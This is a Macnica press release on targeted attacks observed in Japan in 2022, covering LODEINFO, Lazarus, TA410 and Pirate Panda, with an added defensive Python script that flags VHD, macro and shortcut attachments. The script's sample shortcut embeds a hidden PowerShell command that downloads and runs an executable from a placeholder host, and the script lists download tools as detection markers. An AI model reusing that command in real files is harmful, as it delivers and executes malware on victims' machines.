
Macnica today releases an investigation report on targeted attacks against Japanese companies and individuals in 2022 ~Sharing the targeted-attack techniques hidden behind ransomware and contributing to Japan's security measures~

Macnica (headquarters: Yokohama, Kanagawa Prefecture; Representative Director and President: Kazumasa Hara; hereinafter Macnica) has published a research report on the targeted attacks that reached Japan in 2022, "The Reality of Targeted Attacks and Countermeasure Approaches, 7th Edition," and is releasing it today.

In fiscal 2022, adoption of EDR (Endpoint Detection & Response) products, the latest class of security measures, spread across domestic organizations, including their overseas bases, and observations of targeted attacks were sporadic. Targeted attacks have been observed, and awareness of them actively raised, in Japan for about 10 years, but the methods of cybercrime groups using ransomware have shifted to intrusion into corporate networks, so they now share much with targeted-attack methods, and today there are fewer differences in the countermeasures that security products provide. Against this background, the term "targeted attack" is often seen in the security industry as a buzzword of the past.

Unlike ransomware attacks, targeted attacks aimed at stealing information are hard to detect and hard to share information about, and they persist over long periods. As for the trend in targeted attacks, while some industries have been targeted continuously for about 10 years, attacks are also reaching new targets such as the manufacturing industry.

This report contains an analysis, published to raise awareness, of the attack campaigns observed in 2022 that attempted to steal confidential information from Japanese organizations. With targeted attacks against specific organizations continuing to occur and vigilance still required, we hope this report will serve as a reference for the security measures of Japanese companies.

Macnica will continue to persistently analyze and raise awareness of the targeted attacks that are gradually eroding the industrial competitiveness of Japanese companies, and will strive to contribute, however modestly, to the development of the Japanese economy.

[The following is an excerpt from the report]

■ Attack timeline and industries where attacks were observed
In FY2022, continuing the observations of FY2021, attacks using the LODEINFO malware of the APT10 attack group were actively observed in the media and security-related industries, as before. In the LODEINFO attacks, disk image files in VHD format were used as the delivered files in addition to Office macro files, and changes were confirmed to the legitimate executables used for DLL sideloading and to the obfuscation of the loader DLLs. Compared with these, LODEINFO itself, the in-memory payload, was only slightly updated. In addition, as part of an ongoing campaign by the Lazarus attack group against cryptocurrency-related organizations, an attack was observed in which shortcut files were used to run download commands; this differed little from the method reported around 2019. As attacks newly observed in 2022, we observed the Operation RestyLink, EneLink and Earth Yako campaigns at security-related organizations. Also newly observed in FY2022 were an attack using the FlowCloud malware by the TA410 attack group and an attack by Pirate Panda (also known as Tropic Trooper or GouShe); these two campaigns were observed at the Chinese bases of domestic manufacturing companies. For these attacks, spear phishing emails and attachments sent through chat tools were the main infection routes, except for the FlowCloud malware, which was introduced from a USB memory device. Up to FY2021 there were attacks such as the A41APT campaign that exploited vulnerabilities in public-facing systems such as VPN devices, but a feature of FY2022 was that fewer intrusions from public-facing systems were observed.
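As an added example (not code from Macnica or from the report), the following Python triage checks an email or chat attachment for the three delivery artifacts named above: VHD disk images (recognised by the "conectix" footer cookie), OOXML Office documents carrying a vbaProject.bin macro part, and Windows shortcut (.lnk) files whose arguments run a download command. The shortcut parser follows the MS-SHLLINK header and StringData layout. The sample shortcut, disk image and document are constructed inline; the example.invalid URL, the marker list and the tag names are this example's own choices, not indicators taken from the report.

```python
"""Attachment triage for VHD images, macro-bearing Office files and
shortcut files that launch a download command (added example)."""
import io
import struct
import uuid
import zipfile

# LinkCLSID that every Shell Link (.lnk) header carries (MS-SHLLINK 2.1).
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
LNK_FLAGS = {0x01: "id_list", 0x02: "link_info", 0x04: "name",
             0x08: "relative_path", 0x10: "working_dir",
             0x20: "arguments", 0x40: "icon_location", 0x80: "unicode"}
SW_SHOWMINNOACTIVE = 7   # minimised, no focus: keeps the console window out of sight
# Substrings that mark a "download and run" command line (this example's list).
DOWNLOAD_MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
                    "invoke-webrequest", "iwr ", "curl ", "certutil",
                    "bitsadmin", "mshta")


def parse_lnk(data: bytes) -> dict:
    """Parse the fixed header and StringData of a .lnk, skipping the optional
    LinkTargetIDList and LinkInfo blocks. Raises ValueError if not a link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    off = 0x4C
    if flags & 0x01:                      # HasLinkTargetIDList: uint16 size + items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & 0x02:                      # HasLinkInfo: uint32 size includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & 0x80)
    link = {"flags": flags, "show_command": show_command}
    for bit in (0x04, 0x08, 0x10, 0x20, 0x40):   # StringData, in spec order
        if flags & bit:
            count, = struct.unpack_from("<H", data, off)
            off += 2
            size = count * 2 if unicode else count
            raw = data[off:off + size]
            off += size
            link[LNK_FLAGS[bit]] = raw.decode("utf-16-le" if unicode else "cp1252", "replace")
    return link


def looks_like_vhd(data: bytes) -> bool:
    """A VHD ends with a 512-byte footer whose cookie is 'conectix'; dynamic
    and differencing images also carry a copy of that footer at offset 0."""
    return data[:8] == b"conectix" or (len(data) >= 512 and data[-512:-504] == b"conectix")


def has_vba_project(data: bytes) -> bool:
    """OOXML documents (docm/xlsm/pptm) store macros in a vbaProject.bin part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def triage_attachment(data: bytes) -> list:
    """Return tags saying why the attachment deserves an analyst's attention."""
    tags = []
    if looks_like_vhd(data):
        tags.append("vhd:disk-image")
    if has_vba_project(data):
        tags.append("office:vba-macro")
    try:
        link = parse_lnk(data)
    except ValueError:
        return tags
    tags.append("lnk:shortcut")
    args = link.get("arguments", "").lower()
    if any(m in args for m in DOWNLOAD_MARKERS):
        tags.append("lnk:download-command")
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        tags.append("lnk:hidden-window")
    return tags


# --- constructed samples (not real malware; example.invalid never resolves) ---
def build_lnk(relative_path, working_dir, arguments, icon, show_command):
    flags = 0x08 | 0x10 | 0x20 | 0x40 | 0x80          # four Unicode strings, no IDList
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments, icon))
    return header + body


SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe", r"C:\Windows\System32",
    r'/c powershell -w hidden -nop -c "iwr http://example.invalid/a.bin'
    r' -OutFile $env:TEMP\a.exe; start $env:TEMP\a.exe"',
    r"%SystemRoot%\System32\shell32.dll", SW_SHOWMINNOACTIVE)
SAMPLE_VHD = bytes(1024) + b"conectix".ljust(512, b"\0")   # fixed VHD: data + footer
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _z:
    _z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 stub")
SAMPLE_DOCM = _buf.getvalue()
SAMPLE_PDF = b"%PDF-1.7 plain text, nothing of interest"

if __name__ == "__main__":
    for name, blob in (("report.lnk", SAMPLE_LNK), ("disk.vhd", SAMPLE_VHD),
                       ("invoice.docm", SAMPLE_DOCM), ("memo.pdf", SAMPLE_PDF)):
        print(name, triage_attachment(blob))
```

The checks key on structure rather than file extension, since a VHD or shortcut can be renamed to anything before delivery; a mail gateway would run them on the decoded attachment bytes and route tagged files to a sandbox or an analyst.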

<Time Chart>

<Pie chart of target organizations (FY2022)>

In FY2022, we observed many attacks on security-related organizations as targets of the LODEINFO malware and the Operation RestyLink campaign. In the campaign using LODEINFO, attacks on the media industry, which had been observed up to FY2020 but not at all in FY2021, were observed again. As for the detection of attacks on domestic manufacturing organizations, we observed attacks concentrated on their bases in China; we hope that domestic companies doing business in China will refer to the TTPs of attack groups such as TA410 and Pirate Panda and the countermeasures described in this report.

■ Contents
・Introduction
・Timeline of attacks and industries in which attacks were observed
・Overview of attacks
  May 2022
  July 2022
  August 2022
  September 2022
  November 2022
  March 2023
・New TTPs and RATs, etc.
  Pirate Panda China-based spear phishing attack
  Campaign using LODEINFO
・TTPs (tactics, techniques, procedures) for each attack group
・Threat detection and mitigation measures considered from TTPs
  Malware delivery/attack
  Installed RAT and remote control (C2 server)
・Detection indicators

[Click here for the public URL of the report]
https://www.macnica.co.jp/business/security/security-reports/143962/index.html

*Company names and product names mentioned in this text are trademarks or registered trademarks of Macnica and each company.
*The information published in the news release (including product price, specifications, etc.) is current as of the date of announcement. Please note that the information may be subject to change without prior notice.

About Macnica

Macnica is a Service & Solution Company that handles the latest technologies in a comprehensive manner, with semiconductors and cyber security at its core. With operations in 81 locations in 23 countries and regions around the world, the company leverages the technical capabilities and global network it has cultivated over its 50-year history to discover, propose, and implement cutting-edge technologies such as AI, IoT, and autonomous driving.
About Macnica: www.macnica.co.jp

Inquiries from the press regarding this matter

Macnica
Public Relations Office Miyahara, Yamamoto E-mail: macpr@macnica.co.jp
Macnica 1st Building, 1-6-3 Shin-Yokohama, Kohoku-ku, Yokohama, 222-8561